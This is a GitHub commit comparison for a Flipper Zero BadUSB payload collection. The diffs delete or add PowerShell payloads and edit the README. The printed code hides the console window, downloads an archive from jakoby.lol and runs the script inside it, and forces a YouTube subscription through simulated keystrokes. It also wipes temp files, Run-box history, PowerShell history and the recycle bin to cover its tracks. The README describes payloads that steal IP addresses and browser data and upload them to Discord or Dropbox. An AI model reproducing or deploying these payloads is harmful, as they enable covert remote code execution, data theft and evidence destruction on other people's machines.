Compare commits

..

25 commits
main ... badUSB

Author SHA1 Message Date
I-Am-Jakoby
2e140ac4bf
Update README.md 2023-07-25 21:21:22 -05:00
I-Am-Jakoby
bbc1c80efc
Update README.md 2023-07-25 21:19:48 -05:00
I-Am-Jakoby
72098eb212
Delete Payloads/Flip-WifiGrabber directory 2023-07-25 16:28:46 -05:00
I-Am-Jakoby
9c15a69ab7
Delete Payloads/Flip-Subscribe directory 2023-07-25 16:28:29 -05:00
I-Am-Jakoby
733cc17c73
Delete Payloads/Flip-YT-Tripwire directory 2023-07-25 16:28:09 -05:00
I-Am-Jakoby
534c05d54c
Delete Payloads/Flip-We-Found-You directory 2023-07-25 16:28:02 -05:00
I-Am-Jakoby
74134f958a
Delete Payloads/Flip-Wallpaper-Troll directory 2023-07-25 16:27:55 -05:00
I-Am-Jakoby
0e6f441e20
Delete Payloads/Flip-ShortcutJacker directory 2023-07-25 16:27:42 -05:00
I-Am-Jakoby
0c67967cca
Delete Payloads/Flip-Rage-PopUps directory 2023-07-25 16:27:33 -05:00
I-Am-Jakoby
51b2b62870
Delete Payloads/Flip-WallPaper-URL directory 2023-07-25 16:27:09 -05:00
I-Am-Jakoby
6959943969
Delete Payloads/Flip-Play-WAV directory 2023-07-25 16:27:01 -05:00
I-Am-Jakoby
8c18a442d2
Delete Payloads/Flip-PineApple directory 2023-07-25 16:26:54 -05:00
I-Am-Jakoby
fc148f8104
Delete Payloads/Flip-PS-Draw directory 2023-07-25 16:26:47 -05:00
I-Am-Jakoby
abe3f05e64
Delete Payloads/Flip-MustSub directory 2023-07-25 16:26:33 -05:00
I-Am-Jakoby
0ebbc4b020
Delete Payloads/Flip-Keylogger directory 2023-07-25 16:26:26 -05:00
I-Am-Jakoby
3e1de2decd
Delete Payloads/Flip-JumpScare directory 2023-07-25 16:26:09 -05:00
I-Am-Jakoby
98009f8e16
Delete Payloads/Flip-JumpScare-2.0 directory 2023-07-25 16:25:57 -05:00
I-Am-Jakoby
6d12a90bb9
Delete Payloads/Flip-IP-Grabber directory 2023-07-25 16:25:50 -05:00
I-Am-Jakoby
87d6837575
Delete Payloads/Flip-EvilGoose directory 2023-07-25 16:25:41 -05:00
I-Am-Jakoby
35c258d460
Delete Payloads/Flip-Credz-Plz directory 2023-07-25 16:25:33 -05:00
I-Am-Jakoby
f657f8a16f
Delete Payloads/Flip-BrowserData directory 2023-07-25 16:25:22 -05:00
I-Am-Jakoby
c1a2ceb636
Delete Payloads/Flip-AcidBurn directory 2023-07-25 16:25:02 -05:00
I-Am-Jakoby
21826d693b
Delete Payloads/Flip-ADV-RickRoll directory 2023-07-25 16:23:22 -05:00
I-Am-Jakoby
7a3a6acbd4
Delete Payloads/Flip-ADV-Recon directory 2023-07-25 16:22:19 -05:00
I-Am-Jakoby
25fcf460e5
Add files via upload 2023-07-24 23:16:41 -05:00
84 changed files with 80 additions and 145 deletions

View file

@ -32,11 +32,6 @@
############################################################################################################################################################
$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';
add-type -name win -member $i -namespace native;
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
# MAKE LOOT FOLDER, FILE, and ZIP
$FolderName = "$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm)"

View file

Before

Width:  |  Height:  |  Size: 76 KiB

After

Width:  |  Height:  |  Size: 76 KiB

View file

Before

Width:  |  Height:  |  Size: 140 KiB

After

Width:  |  Height:  |  Size: 140 KiB

View file

Before

Width:  |  Height:  |  Size: 184 KiB

After

Width:  |  Height:  |  Size: 184 KiB

View file

@ -1,5 +0,0 @@
$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';
add-type -name win -member $i -namespace native;
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
cd "$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "rr.zip";Expand-Archive "rr.zip" -Force; .\rr.ps1

Binary file not shown.

View file

@ -1,74 +0,0 @@
function Target-Comes {
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
$o=New-Object -ComObject WScript.Shell
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
}
#############################################################################################################################################
#WPF Library for Playing Movie and some components
Add-Type -AssemblyName PresentationFramework
Add-Type -AssemblyName System.ComponentModel
#XAML File of WPF as windows for playing movie
[xml]$XAML = @"
<Window xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
Title="PowerShell Video Player" WindowState="Maximized" ResizeMode="NoResize" WindowStartupLocation="CenterScreen" >
<MediaElement Stretch="Fill" Name="VideoPlayer" LoadedBehavior="Manual" UnloadedBehavior="Stop" />
</Window>
"@
#Movie Path
[uri]$VideoSource = "$env:TMP\rr.mp4"
#Devide All Objects on XAML
$XAMLReader=(New-Object System.Xml.XmlNodeReader $XAML)
$Window=[Windows.Markup.XamlReader]::Load( $XAMLReader )
$VideoPlayer = $Window.FindName("VideoPlayer")
#Video Default Setting
$VideoPlayer.Volume = 100;
$VideoPlayer.Source = $VideoSource;
#$VideoPlayer.Padding = new Thickness(5);
Target-Comes
$VideoPlayer.Play()
#Show Up the Window
$Window.ShowDialog() | out-null
# Turn of capslock if it is left on
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
if ($caps -eq $true){$key = New-Object -ComObject WScript.Shell;$key.SendKeys('{CapsLock}')}
# empty temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Empty recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

Binary file not shown.

View file

@ -1,9 +0,0 @@
Add-Type -AssemblyName System.Windows.Forms
$o=New-Object -ComObject WScript.Shell
$url = -join($channel,"?sub_confirmation=1")
Start-Process "$url"
Start-Sleep -Seconds 5
[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2)
[System.Windows.Forms.SendKeys]::SendWait('{ENTER}')
Start-Sleep -Seconds 1
[System.Windows.Forms.SendKeys]::SendWait('%{F4}')

View file

Before

Width:  |  Height:  |  Size: 934 KiB

After

Width:  |  Height:  |  Size: 934 KiB

View file

Before

Width:  |  Height:  |  Size: 20 KiB

After

Width:  |  Height:  |  Size: 20 KiB

View file

Before

Width:  |  Height:  |  Size: 383 B

After

Width:  |  Height:  |  Size: 383 B

View file

Before

Width:  |  Height:  |  Size: 16 KiB

After

Width:  |  Height:  |  Size: 16 KiB

View file

Before

Width:  |  Height:  |  Size: 18 KiB

After

Width:  |  Height:  |  Size: 18 KiB

View file

Before

Width:  |  Height:  |  Size: 11 KiB

After

Width:  |  Height:  |  Size: 11 KiB

View file

@ -0,0 +1,38 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Subscribe | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : General | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# tiktok.com/@i_am_jakoby # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.DESCRIPTION
This program is designed to get your target to subscribe to your YouTube channel.
#>
#############################################################################################################################################
# Enter your YouTube channel URL here, ONLY if you are rehosting this script yourself
# $channel = "https://www.youtube.com/iamjakoby"
Add-Type -AssemblyName System.Windows.Forms
$o=New-Object -ComObject WScript.Shell
$url = -join($channel,"?sub_confirmation=1")
Start-Process "$url"
Start-Sleep -Seconds 5
[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2)
[System.Windows.Forms.SendKeys]::SendWait('{ENTER}')
Start-Sleep -Seconds 1
[System.Windows.Forms.SendKeys]::SendWait('%{F4}')

View file

@ -98,6 +98,6 @@ Clear-RecycleBin -Force -ErrorAction SilentlyContinue
}
# Target-Comes
Target-Comes
Set-WallPaper -Image $wp -Style Fill
# Clean-Exfil
Clean-Exfil

View file

Before

Width:  |  Height:  |  Size: 89 KiB

After

Width:  |  Height:  |  Size: 89 KiB

View file

Before

Width:  |  Height:  |  Size: 114 KiB

After

Width:  |  Height:  |  Size: 114 KiB

View file

@ -1,2 +1 @@
#
saps calc

View file

@ -2,16 +2,51 @@
# 💀 BadUSB 💀
<!-- CONTACT -->
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://youtube.com/c/IamJakoby?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/I_Am_Jakoby">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/i_am_jakoby/">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/insta.png width="48" height="48" alt="Golang" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>Discord
</td>
<td align="center" width="96">
<a href="https://www.tiktok.com/@i_am_jakoby?lang=en">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/img/tiktok.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>TikTok
</td>
</tr>
</table>
</div>
<p align="center">
<a href="https://github.com/sponsors/I-Am-Jakoby">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/Discord-Sponsor.png width="125" alt="Python" />
</a>
</p>
Subscribing to my YouTube would also be greatly appreciated.
[<img src="https://custom-icon-badges.herokuapp.com/badge/-Subscribe-red?style=for-the-badge&logo=video&logoColor=white"/>](https://jakoby.lol/yno)
<img src= https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/img/disclaimer.png width="600" alt="C#" />
</div>
@ -26,17 +61,12 @@ Subscribing to my YouTube would also be greatly appreciated.
[Acknowledgments](#Acknowledgments)
# Unleash the power of your Flipper 🤓💻
***
## Description
🥇 I am in 1st place for most payloads submitted to Hak5❗
🔓 I have taken my colllection of payloads and formatted them to work for the Flipper for all of you to use❗
🥇 I won HAK5's Hacker of the year award for my badUSB contributions❗
⚠️ Please ENJOY and use RESPONSIBLY❗
@ -78,46 +108,7 @@ This, in turn, makes it so the user no longer needs to host their own version of
| [IP Grabber](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-IP-Grabber) | Grabs your target's IP addresses and uploads them to either Dropbox, Discord, or both. |✅ | Jakoby |
| [Browser Data](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-BrowserData)| This payload can be used to retrieve the browsing history and bookmarks of your target. |✅ | Jakoby |
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://youtube.com/c/IamJakoby?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/I_Am_Jakoby">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/i_am_jakoby/">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/insta.png width="48" height="48" alt="Golang" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>Discord
</td>
<td align="center" width="96">
<a href="https://www.tiktok.com/@i_am_jakoby?lang=en">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/img/tiktok.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>TikTok
</td>
</tr>
</table>
</div>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments